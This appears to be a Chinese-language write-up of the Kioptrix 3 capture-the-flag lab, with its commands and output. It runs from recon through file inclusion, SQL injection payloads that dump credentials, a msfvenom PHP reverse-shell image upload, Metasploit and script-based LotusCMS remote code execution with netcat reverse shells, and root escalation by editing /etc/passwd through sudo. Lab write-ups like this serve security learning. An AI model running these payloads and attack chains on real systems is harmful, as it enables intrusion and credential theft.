信息收集

同样用netdiscover发现目标主机。

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~# netdiscover 

Currently scanning: 192.168.194.0/16 | Screen View: Unique Hosts

13 Captured ARP Req/Rep packets, from 4 hosts. Total size: 780
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.43.1 ac:c1:ee:31:3f:25 6 360 Xiaomi Communications Co Ltd
192.168.43.33 44:03:2c:68:d8:0f 2 120 Intel Corporate
192.168.43.58 00:0c:29:b2:76:40 4 240 VMware, Inc.
192.168.43.158 00:0c:29:38:2d:6f 1 60 VMware, Inc.

目标IP为192.168.43.158

用nmap扫描目标主机端口信息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@kali:~# nmap -A -sS -n 192.168.43.158
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT
Nmap scan report for 192.168.43.158
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.43.158

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

由扫描信息可以得到

  • 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  • 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
  • OS details: Linux 2.6.9 - 2.6.33

80端口可以看出cms为Lotus CMS

dirb扫描一下网站目录。也可以用御剑扫描目录。发现存在phpdamin

cms后台http://192.168.43.158/index.php?system=Admin

漏洞利用

文件包含&后台上传

访问80端口上的WEB服务。

发现url中有点问题

http://192.168.43.158/index.php?system=Blog

尝试system=../../../../../etc/passwd

好像不行,尝试%00.截断,发现可以读到/etc/passwd

http://192.168.43.158/index.php?system=../../../../../../../../etc/passwd%00.

这里可以结合后面SQLmap跑出来的后台密码得到了一个shell。

1
2
3
4
5
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes

msfvenom生成一个图片马

我们在后台上传图片的地方上传一个图片

修改已有的图片,并得到图片的名,

利用msf监听端口

利用文件包含,包含上传图片,这个地方比较鸡肋。因为这个绝对路径我们是得不到的。

1
http://kioptrix3.com/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/thumb_1a2o44437j.jpg%00.

访问返回一个shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.177
LHOST => 192.168.43.177
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.43.177:443
[*] Sending stage (37775 bytes) to 192.168.43.158
[*] Meterpreter session 1 opened (192.168.43.177:443 -> 192.168.43.158:51226) at 2018-05-08 12:53:09 -0400

meterpreter > ls
Listing: /home/www/kioptrix3.com
================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2011-04-15 09:21:17 -0400 cache
40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 core
40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 data
100644/rw-r--r-- 23126 fil 2011-04-14 12:23:13 -0400 favicon.ico
40755/rwxr-xr-x 4096 dir 2011-04-14 11:32:31 -0400 gallery
100644/rw-r--r-- 26430 fil 2011-04-14 12:23:13 -0400 gnu-lgpl.txt
100644/rw-r--r-- 399 fil 2011-04-14 12:23:13 -0400 index.php
40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 modules
40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 style
100644/rw-r--r-- 243 fil 2011-04-14 12:23:13 -0400 update.php

权限有点小,很多命令都执行不了的。

SQLmap进行SQL注入

这个站是有的链接有问题,302跳转到kioptrix3.com

etc/passwd添加

1
192.168.43.158  kioptrix3.com

service networking restart重启服务

发现url存在SQL注入。kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos

先用sqlmap进行注入测试,id存在报错注入。

尝试查找下后台管理员账号密码。

1
2
3
4
5
6
7
8
9
Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

得到管理员账号密码,但是在

无法登录,另外找到一个登录的地方http://kioptrix3.com/gallery/gadmin/

1
2
3
4
5
6
7
8
Database: gallery
Table: gallarific_users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| admin | n0t7t1k4 |
+----------+----------+

但是可以登录。

这里虽然可以是rootdba权限,但是没有绝对路径。不能直接用sqlmap进行写shell。

手注sqli

1
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6#

判断一共有6列

1
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,version(),database(),4,5,6#

得到当前数据库和版本号

1
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema%20=%20database()#

得到当前数据库所有的表名。

1
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name%20=0x6465765f6163636f756e7473#

获取表里的列名。

1
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts#

Lotus CMS 漏洞

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# searchsploit Lotus CMS
------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------- ----------------------------------------
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote C | exploits/php/webapps/15964.py
Lotus Core CMS 1.0.1 - Remote File Inclusion | exploits/php/webapps/5866.txt
LotusCMS 3.0 - 'eval()' Remote Command Execution (Meta | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities | exploits/php/webapps/16982.txt
------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

从查询结果看,有一个本地文件包含和一个远程代码执行,

这里的本地文件包含就是我们之前发现的那个。我们尝试下这个本地文件包含漏洞

尝试发现这个漏洞好像不行。

尝试LotusCMS 3.0 - 'eval()' Remote Command Execution 发现是一个rb文件。

于是

1
2
3
4
5
6
7
8
msf > search LotusCMS

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/lcms_php_exec 2011-03-03 excellent LotusCMS 3.0 eval() Remote Command Execution

利用这个漏洞进行攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /lcms/ yes URI
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 Automatic LotusCMS 3.0


msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58
RHOST => 192.168.43.58
msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(multi/http/lcms_php_exec) > set URI /
URi => /
msf exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.43.58 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI / yes URI
VHOST no HTTP server virtual host


Payload options (generic/shell_bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.43.58 no The target address


Exploit target:

Id Name
-- ----
0 Automatic LotusCMS 3.0


msf exploit(multi/http/lcms_php_exec) > run

[*] Started bind handler
[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158
RHOST => 192.168.43.158
msf exploit(multi/http/lcms_php_exec) > run

[*] Started bind handler
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400

whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
pwd
/home/www/kioptrix3.com

我尝试用cd命令进入gallery目录但是不行,

这里用到ls -l可以看到gallery目录的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
ls -l gallery
total 156
drwxr-xr-x 2 root root 4096 Apr 12 2011 BACK
-rw-r--r-- 1 root root 3573 Oct 10 2009 db.sql
-rw-r--r-- 1 root root 252 Apr 12 2011 g.php
drwxr-xr-x 3 root root 4096 Apr 12 2011 gadmin
-rw-r--r-- 1 root root 214 Apr 12 2011 gallery.php
-rw-r--r-- 1 root root 1440 Apr 14 2011 gconfig.php
-rw-r--r-- 1 root root 297 Apr 12 2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12 2011 gfunctions.php
-rw-r--r-- 1 root root 1009 Apr 12 2011 gheader.php
-rw-r--r-- 1 root root 249 Apr 12 2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12 2011 install.BAK
-rw-r--r-- 1 root root 212 Apr 12 2011 login.php
-rw-r--r-- 1 root root 213 Apr 12 2011 logout.php
-rw-r--r-- 1 root root 249 Apr 12 2011 p.php
drwxrwxrwx 2 root root 4096 Apr 12 2011 photos
-rw-r--r-- 1 root root 213 Apr 12 2011 photos.php
-rw-r--r-- 1 root root 219 Apr 12 2011 post_comment.php
-rw-r--r-- 1 root root 214 Apr 12 2011 profile.php
-rw-r--r-- 1 root root 87 Oct 10 2009 readme.html
-rw-r--r-- 1 root root 213 Apr 12 2011 recent.php
-rw-r--r-- 1 root root 215 Apr 12 2011 register.php
drwxr-xr-x 2 root root 4096 Apr 13 2011 scopbin
-rw-r--r-- 1 root root 213 Apr 12 2011 search.php
-rw-r--r-- 1 root root 216 Apr 12 2011 slideshow.php
-rw-r--r-- 1 root root 211 Apr 12 2011 tags.php
drwxr-xr-x 6 root root 4096 Apr 12 2011 themes
-rw-r--r-- 1 root root 56 Oct 10 2009 version.txt
-rw-r--r-- 1 root root 211 Apr 12 2011 vote.php

发现gconfig.php配置文件,cat读配置文件。

1
2
3
4
5
6
7

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

lotusRCE.sh

1
wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~# chmod +x lotusRCE.sh
root@kali:~# ./lotusRCE.sh 192.168.43.158

Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.43.177
What PORT?
2333

OK, open your local listener and choose the method for back connect:
1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1
1
2
3
4
5
6
7
root@kali:/tmp# nc -lvp 2333
listening on [any] 2333 ...
connect to [192.168.43.177] from kioptrix3.com [192.168.43.158] 56259
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

权限提升

尝试用之前SQL注入得到的。

1
2
3
4
5
6
7
8
9
Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

进行SSH连接,发现第一个账号不能没有多大的作用,不能提权。

连接第二个账号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh CompanyPolicy.README

存在一个CompanyPolicy.README文件.

1
2
3
4
5
6
7
8
9
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

英语比较垃圾,百度翻译的意思是可以通过sudo ht对文件进行编辑,创建。

在kali下尝试

1
2
loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.

报错不能打开一个xterm-256color.终端。

回到本地环境用xshell连接是可以打开的

此时按F3,可以输入/etc/passwd或者/etc/sudoers文件来进行文件编辑

把/etc/passwd当前用户的权限修改和root一样即可。

也可以把/etc/sudoers当前用户的权限修改和root一样即可。

重新登录SSH。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password:
Last login: Tue May 8 19:27:01 2018 from uknow-pc
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)
root@Kioptrix3:~# whoami
root

此时已经是root权限了。

总结

这次实验过程挺长的,发现了很多地方的问题,第一是发现了phpmyadmin我尝试用写日志的方法试试能不能拿到shell。但是发现phpmyadmin变量了不存在general log变量。

另外就是这里有个SQL注入,可以用sqlmap跑出来,是root权限。尝试用os-shell写shell。通过了之前用远程命令执行得到的绝对路径,但是还是无法写入。好像是目录权限的问题。

phpmyadmin下也无法执行INTO OUTFILE函数。显示#1 - Can't create/write to file。从在命令执行里也看得出来目录是没有权限的。

在最后补充了一个文件包含和后台上传的利用,这个组合通过文件包含执行图片木马,得到一个shell。虽然说很鸡肋,还是感觉有点厉害的。

在实验过程中还是想多多尝试多种方法的,但是实验环境还是有限。但在这次实验中还是学到了很多,做了几次vulnhub的实验了,感觉提权方面还是有学习到很多。

虽然说这些环境有点不常见甚至奇葩,但是还是在这个过程中学到了linux环境下的一些之前一直匮乏的知识。